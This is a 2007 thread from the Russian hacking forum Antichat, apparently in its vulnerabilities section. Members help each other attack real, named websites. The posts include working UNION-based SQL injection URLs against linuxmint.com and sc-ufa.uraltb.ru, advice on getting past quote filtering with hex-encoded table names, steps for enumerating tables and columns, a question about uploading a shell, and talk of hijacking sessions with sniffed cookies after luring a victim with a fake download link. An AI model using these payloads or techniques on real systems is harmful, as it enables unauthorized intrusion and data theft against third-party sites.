HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #281  
Старый 08.11.2007, 19:13
YaNeLam
Новичок
Регистрация: 23.10.2007
Сообщений: 28
С нами: 9763159

Репутация: 19
По умолчанию

а Как
Вот в куках есть
Member_id:это я нашол
Pass_hash:а суда чито ставить?*
 
Ответить с цитированием

  #282  
Старый 08.11.2007, 19:27
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

А как сам думаешь? Вот ты нашел в данных с сниффера Pass_hash ??? Ответ напрашивается...человек в данный момент не авторизован на форуме.
Подскажите с инъектом,я ток начал пробовать..
Код:
http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,TABLE_NAME,4,5,6+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='admin'+LIMIT+1,1+--+
Я так понял, что фильтруется кавычка, как можно это сделать иначе ?

Последний раз редактировалось ZAMUT; 08.11.2007 в 19:33..
 
Ответить с цитированием

  #283  
Старый 08.11.2007, 19:31
YaNeLam
Новичок
Регистрация: 23.10.2007
Сообщений: 28
С нами: 9763159

Репутация: 19
По умолчанию

Авторизирован.
Я ему отослал на форуме лс:
Привет.Зайди,скачай пак анекдотов.
Он зашел и все....
ОН АВТОРИЗИРОВАН.
 
Ответить с цитированием

  #284  
Старый 08.11.2007, 20:04
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
С нами: 10246130

Репутация: 141
По умолчанию

zamut,
Where+table_name=название в хексе
Where+table_name=название в чаре
 
Ответить с цитированием

  #285  
Старый 08.11.2007, 20:07
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

2delay(0)
спс, сейчас попробую..
 
Ответить с цитированием

  #286  
Старый 08.11.2007, 20:11
VentRu
Новичок
Регистрация: 27.09.2007
Сообщений: 11
С нами: 9800721

Репутация: 4
По умолчанию

извиняюсь, версию недоглядел..автор, наверно, допустил опечатку
http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,COLUMN_NAME,4,5,6+FROM+INFORMAT I ON_SCHEMA.COLUMNS+WHERE+COLUMN_NAME='admin'+LIMIT+ 1 ,1+--+

Последний раз редактировалось VentRu; 08.11.2007 в 21:12..
 
Ответить с цитированием

  #287  
Старый 10.11.2007, 04:16
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами: 10126406

Репутация: 206
По умолчанию

http://sc-ufa.uraltb.ru/?id=4+UNION+SELECT+1,2,3+LIMIT+1,1/*
можно ли сюда шелл залить или пароль получить от админки? или от БД
 
Ответить с цитированием

  #288  
Старый 10.11.2007, 04:33
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами: 10488959

Репутация: 474
По умолчанию

Шелл не зальешь. Файл прив выключен, есть экранирование кавычек.
Прав на чтение mysql.user нет

Версия мускула 5, можно узнать имена таблиц и столбцов
Код:
http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,table_name,3+from+INFORMATION_SCHEMA.tables+limit+16,1/*
вот например таблица _a3access
Код:
http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,table_name,3+from+INFORMATION_SCHEMA.tables+limit+16,1/*
Для просмотра меняшь limit.
вот пример просмотра столбцов в этой же таблице
Код:
http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,column_name,3+from+INFORMATION_SCHEMA.columns+where+table_name=0x5F6133616363657373+limit+0,1/*
Для просмотра других столбцов также меняешь лимит
 
Ответить с цитированием

  #289  
Старый 10.11.2007, 05:42
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами: 10126406

Репутация: 206
По умолчанию

ещё вопрос, как изменять данные которые находяться в столбцах
 
Ответить с цитированием

  #290  
Старый 10.11.2007, 12:08
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Цитата:
Сообщение от SVAROG  
ещё вопрос, как изменять данные которые находяться в столбцах
При помощи MySql инъекции в конструкции select никак, потому что нет возможности использовать разделитель ";"
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.